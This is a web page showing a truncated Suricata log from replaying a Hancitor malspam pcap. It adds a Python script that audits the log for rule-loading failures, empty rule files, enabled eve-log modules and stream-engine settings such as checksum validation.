28/1/2019 -- 12:19:20 - <Config> - AutoFP mode using "Hash" flow load balancer
28/1/2019 -- 12:19:20 - <Info> - reading pcap file /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap
28/1/2019 -- 12:19:

This file has been truncated.
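A practitioner reading a suricata.log like the one above wants three things checked before trusting the alerts: that every rule file actually contributed signatures, that no rules failed to parse, and that the stream-engine settings are appropriate for the input (offline pcap versus live sensor). The script below is an added example, not part of this page and not Suricata's own tooling; it parses a trimmed copy of the log lines shown above and turns them into an audit. The required eve-log module list and the finding keys are this example's own conventions.

```python
import re

# Sample input: a trimmed copy of the suricata.log lines from this page (not the
# full file), embedded so the audit runs offline. The last line is the truncated
# one from the page, kept to show that unparseable lines are skipped.
SAMPLE_LOG = """\
28/1/2019 -- 12:19:00 - <Config> - stream "midstream" session pickups: disabled
28/1/2019 -- 12:19:00 - <Config> - stream "checksum-validation": disabled
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "depth": 0
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
28/1/2019 -- 12:19:05 - <Config> - No rules loaded from ET-icmp.rules.
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
28/1/2019 -- 12:19:13 - <Config> - No rules loaded from local.rules.
28/1/2019 -- 12:19:13 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'alert'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'http'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'dns'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'tls'
28/1/2019 -- 12:19:20 - <Info> - reading pcap file /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap
28/1/2019 -- 12:19:
"""

# One suricata.log record: "<date> -- <time> - <Level> - <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} -- \d{2}:\d{2}:\d{2}) - <(?P<level>\w+)> - (?P<msg>.*)$"
)
RULE_FILE_RE = re.compile(r"^Loading rule file: (?P<path>\S+)$")
EMPTY_RULES_RE = re.compile(r"^No rules loaded from (?P<name>\S+)\.$")
SUMMARY_RE = re.compile(
    r"^(?P<files>\d+) rule files processed\. (?P<ok>\d+) rules successfully loaded, (?P<failed>\d+) rules failed$"
)
EVE_MODULE_RE = re.compile(r"^enabling 'eve-log' module '(?P<module>[\w-]+)'$")
PCAP_RE = re.compile(r"^reading pcap file (?P<path>\S+)$")
# Covers: stream "midstream" session pickups: disabled / stream."inline": disabled /
#         stream.reassembly "depth": 0
STREAM_SETTING_RE = re.compile(
    r'^(?P<scope>stream(?:\.reassembly)?)\.?\s*"(?P<key>[\w-]+)"(?: session pickups)?: (?P<value>\S+)$'
)


def parse_log(text):
    """Split suricata.log into records; lines that do not parse (e.g. a truncated tail) are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def audit_suricata_log(text, required_eve_modules=("alert", "http", "dns", "tls", "files")):
    """Extract rule-loading, output and stream-engine facts and derive findings (key, message)."""
    r = {"rule_files": [], "empty_rule_files": [], "rules_loaded": None, "rules_failed": None,
         "eve_modules": [], "stream": {}, "pcap": None, "findings": []}
    for rec in parse_log(text):
        msg = rec["msg"]
        if m := RULE_FILE_RE.match(msg):
            r["rule_files"].append(m["path"])
        elif m := EMPTY_RULES_RE.match(msg):
            r["empty_rule_files"].append(m["name"])
        elif m := SUMMARY_RE.match(msg):
            r["rules_loaded"], r["rules_failed"] = int(m["ok"]), int(m["failed"])
        elif m := EVE_MODULE_RE.match(msg):
            r["eve_modules"].append(m["module"])
        elif m := PCAP_RE.match(msg):
            r["pcap"] = m["path"]
        elif m := STREAM_SETTING_RE.match(msg):
            r["stream"][f'{m["scope"]}.{m["key"]}'] = m["value"]

    f, s = r["findings"], r["stream"]
    if r["rules_failed"] is None:
        f.append(("no_rule_summary", "no rule-loading summary line: loading did not complete"))
    elif r["rules_failed"] > 0:
        f.append(("rules_failed", f'{r["rules_failed"]} rules failed to parse; check earlier log lines'))
    for name in r["empty_rule_files"]:
        f.append(("empty_rule_file", f"{name} contributed no rules (empty or fully commented out)"))
    if s.get("stream.midstream") == "disabled":
        f.append(("midstream_disabled", "TCP sessions whose handshake predates the capture are not inspected"))
    if s.get("stream.checksum-validation") == "disabled":
        # Acceptable for pcaps mangled by checksum offload; on a live sensor it lets an
        # attacker feed the IDS bad-checksum packets that the real endpoint discards.
        f.append(("checksum_validation_disabled", "bad-checksum packets are inspected like any other"))
    if s.get("stream.reassembly.depth") == "0":
        f.append(("reassembly_depth_unlimited", "depth 0 = no limit: full-stream inspection, more memory"))
    missing = [m for m in required_eve_modules if m not in r["eve_modules"]]
    if missing:
        f.append(("eve_modules_missing", "eve-log modules not enabled: " + ", ".join(missing)))
    if r["pcap"] is None:
        f.append(("no_pcap", "no 'reading pcap file' line: Suricata never reached the input stage"))
    return r


if __name__ == "__main__":
    report = audit_suricata_log(SAMPLE_LOG)
    print(f'{len(report["rule_files"])} rule files, {report["rules_loaded"]} rules loaded, '
          f'{report["rules_failed"]} failed, pcap={report["pcap"]}')
    for key, message in report["findings"]:
        print(f"[{key}] {message}")
```

Run it against a real suricata.log by replacing SAMPLE_LOG with the file contents. On this page's run the interesting findings are the two empty rule files (local.rules is empty by design; ET-icmp.rules shipping empty is worth confirming against the ruleset), midstream pickup being off (a pcap that starts mid-session loses those flows), and checksum validation being off, which is the right choice for replaying a capture taken with offload enabled but not for a production sensor.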